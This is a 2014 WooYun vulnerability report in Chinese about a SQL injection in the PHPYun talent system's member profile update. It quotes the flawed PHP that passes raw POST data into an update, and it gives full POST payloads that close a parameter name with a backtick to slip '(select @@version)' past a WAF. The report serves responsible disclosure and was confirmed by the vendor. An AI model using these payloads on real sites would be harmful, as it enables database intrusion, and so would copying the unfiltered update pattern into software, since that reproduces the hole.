当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(11) 关注此漏洞

缺陷编号: WooYun-2014-60166

漏洞标题: 云人才系统SQL注入,绕过WAF

相关厂商: php云人才系统

漏洞作者: 酱油甲

提交时间: 2014-05-11 15:39

公开时间: 2014-08-09 15:40

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

0人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-11: 细节已通知厂商并且等待厂商处理中
2014-05-11: 厂商已经确认,细节仅向厂商公开
2014-05-14: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-07-05: 细节向核心白帽子及相关领域专家公开
2014-07-15: 细节向普通白帽子公开
2014-07-25: 细节向实习白帽子公开
2014-08-09: 细节向公众公开

简要描述:

云人才系统SQL注入,绕过WAF

详细说明:

云人才系统SQL注入,绕过了360的WAF~~



首先需要注册一个普通用户~

比如官方演示站点:

1.jpg





然后来到

http://**.**.**.**/member/index.php?M=index&C=info



可以看到有某数字的WAF:

2.jpg





于是我们发现代码如下:

code 区域
function info_action(){


		if($_POST["submitBtn"]){


			$_POST=$this->post_trim($_POST);


			if($_POST["name"]==""){


				$this->obj->ACT_msg("index.php?C=info","��������Ϊ�գ�");


			}


			if($_POST["city"]==""){


				$this->obj->ACT_msg("index.php?C=info","�������ڵز���Ϊ�գ�");


			}


			if($this->config['user_idcard']=="1")


			{


				if($_POST["idcard"]==""){


					$this->obj->ACT_msg("index.php?C=info","���֤���벻��Ϊ�գ�");


				}


			}


			if($_POST["cityid"]==""){


				$this->obj->ACT_msg("index.php?C=info","�־�ס�ز���Ϊ�գ�");


			}


			if($_POST["address"]==""){


				$this->obj->ACT_msg("index.php?C=info","��ϸ��ַ����Ϊ�գ�");


			}


			unset($_POST["submitBtn"]);


			$this->obj->delfiledir("../upload/tel/".$this->uid);


			$where["uid"]=$this->uid;


			$nid=$this->obj->update_once("resume",$_POST,$where);





最后update_once的时候直接把$_POST带入,然后再处理数组,而且想到如果不使用等号,就能绕过WAF,于是就使用反引号闭合来注入:

火狐插件提交语句为:

code 区域
name=123123&sex=6&birthday=1988-01-01&marriage=8&height=&nationality=&weight=&province=3&city=38&three_city=400&idcard=&telphone=13989765678&telhome=&email=testtest%**.**.**.**&edu=9&provinceid=9&cityid=88&three_cityid=485&exp=18&address=dsfsdfdsfsdf&submitBtn=+%B1%A3+%B4%E6&description%60%3D%28select+%40%40version%29%23=123





也可以使用burp提交:

code 区域
name=123123&sex=6&birthday=1988-01-01&marriage=8&height=&nationality=&weight=&province=3&city=38&three_city=400&idcard=&telphone=13989765678&telhome=&email=testtest%**.**.**.**&edu=9&provinceid=9&cityid=88&three_cityid=485&exp=18&address=dsfsdfdsfsdf&submitBtn=%2B%B1%A3%2B%B4%E6&description%60%3D%28select%2B%40%40version%29%23=123





~这里就绕过了WAF限制~~

漏洞证明:

看看效果:

VERSION

3.jpg





数据库路径:

4.jpg





数据库用户:

5.jpg

修复方案:

过滤

版权声明:转载请注明来源 酱油甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-05-11 15:47

厂商回复:

感谢您的提供,我们会尽快修复!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2014-05-12 14:54 | phith0n 认证白帽子 ( 普通白帽子 | Rank:804 漏洞数:125 | 一个想当文人的黑客~)
    0

    关注

    1# 回复此人
  2. 2014-05-19 11:43 | neal ( 普通白帽子 | Rank:219 漏洞数:23 )
    0

    是绕过自带的WAF吗

    2# 回复此人

登录后才能发表评论,请先 登录